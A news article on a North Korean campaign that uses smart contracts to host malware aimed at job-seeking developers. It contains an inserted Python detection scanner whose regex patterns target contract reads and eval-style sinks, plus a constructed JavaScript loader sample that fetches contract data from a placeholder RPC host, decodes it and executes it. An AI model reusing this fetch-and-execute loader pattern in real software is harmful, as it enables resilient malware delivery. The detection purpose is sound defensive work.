North Korean Hackers Target Developers With Crypto-Stealing Malware

The campaign is the first known case of nation-state threat actors using the EtherHiding technique, according to Google researchers.

Published on Oct 17, 2025
Written by Caitlin Harris

Hackers linked to North Korea are using public blockchains to deliver malware and steal cryptocurrency from job-seeking developers.

Researchers at Google Threat Intelligence Group (GTIG) observed a threat actor it tracks as UNC5342 using a technique called “EtherHiding” to embed malicious code within a smart contract on a public blockchain, such as Ethereum or BNB Smart Chain.

“This approach essentially turns the blockchain into a decentralized and highly resilient command-and-control (C2) server,” GTIG explains.

The UNC5342 actor is using this technique as part of a broader social engineering campaign, says GTIG. In this campaign, the threat actors are targeting job-seeking developers in the social engineering and technology sectors. 

Posing as fake recruiters, the attackers contact potential victims with attractive job offers, before asking them to perform a coding test or project review. This “assessment” manipulates the victim into downloading malicious code, either disguised as a job-related GitHub file or a video-call link.

Once the victim installs the initial malicious payload, the attacker can use the EtherHiding technique to deploy second-stage malware that steals sensitive data and cryptocurrency, followed by a third-stage backdoor that gives them persistent remote access to the compromised system for long-term espionage.
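Because the page only describes EtherHiding at a high level (code stored in a smart contract, read from the chain and executed by a loader), here is an added detection-side example, not code from GTIG or from the campaign: a heuristic scanner that flags JavaScript which both reads contract state over JSON-RPC and feeds the result into a code-execution sink. The indicator set, the RPC host `rpc.example.invalid`, and both sample scripts are constructed assumptions.

```python
"""Heuristic scanner for JavaScript that pulls data out of a smart contract and
executes it, the EtherHiding loader shape described in the article. Added example;
the indicators are an assumption about how such a loader looks, not known IoCs."""
import re

INDICATORS = {
    # Read-only contract call, either raw JSON-RPC or via a web3-style wrapper.
    "contract_read": re.compile(r"\beth_call\b|\.methods\.\w+\(.*?\)\.call\("),
    # Chain client library or raw JSON-RPC envelope present at all.
    "chain_client": re.compile(r"\bweb3\b|\bethers\b|\bjsonrpc\b"),
    # Retrieved bytes being turned back into text before use.
    "decode_step": re.compile(r"hexToUtf8|toUtf8String|fromCharCode|atob\s*\("),
    # Dynamic-code sinks: the step that turns fetched text into running code.
    "exec_sink": re.compile(r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\("),
}

def scan_script(src: str) -> dict:
    """Return which indicators fire and a verdict.

    A script is flagged only when it both reads contract state and contains an
    execution sink; reading the chain alone (wallets, explorers) is benign.
    """
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    return {"hits": hits, "suspicious": hits["contract_read"] and hits["exec_sink"]}

# Constructed sample 1: a normal dApp reading a token balance and displaying it.
BENIGN_JS = """
const res = await fetch("https://rpc.example.invalid", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: TOKEN, data: balanceOfSelector + padded}, "latest"]})});
document.getElementById("bal").textContent = (await res.json()).result;
"""

# Constructed sample 2: the loader shape, with a zero placeholder address and no
# payload. It reads contract data, decodes it to text and executes the result.
LOADER_JS = """
const res = await fetch("https://rpc.example.invalid", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: "0x0000000000000000000000000000000000000000", data: "0x"}, "latest"]})});
const js = hexToUtf8((await res.json()).result);
new Function(js)();
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_JS), ("loader", LOADER_JS)):
        print(name, scan_script(src))
```

Run it over scripts collected by a proxy or EDR; the verdict is a triage hint, since a loader can split the read and the sink across files.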

A New Generation Of Malware Deployment

This is the first known case of a nation-state actor using the EtherHiding technique, the researchers say.

“EtherHiding represents a shift toward next-generation bulletproof hosting, where the inherent features of blockchain technology are repurposed for malicious ends.”

Because the code is stored on a decentralized and permissionless blockchain that can’t be modified or taken offline, EtherHiding makes it much harder to remove malware using conventional takedown efforts. This means that the malicious code typically remains active for as long as the blockchain itself is operational.

Additionally, the anonymous nature of blockchain transactions makes it difficult for law enforcement to trace the identity of attackers using this technique.

Once executed, the code retrieved through EtherHiding enables the attackers to carry out various malicious activities, such as displaying fake login pages to steal credentials, installing information-stealing malware, or deploying ransomware.

“This technique underscores the continuous evolution of cyber threats as attackers adapt and leverage new technologies to their advantage,” says GTIG.

Recommended Mitigation

Individuals who receive attractive job offers should remain vigilant and apply caution when asked to download anything, including job-related files and video conferencing software. Where possible, we recommend testing files in an isolated environment.

GTIG also urges administrators to place download restrictions on risky file types on Chrome Enterprise, assume full control of browser updates, and enforce strict web access and script execution policies.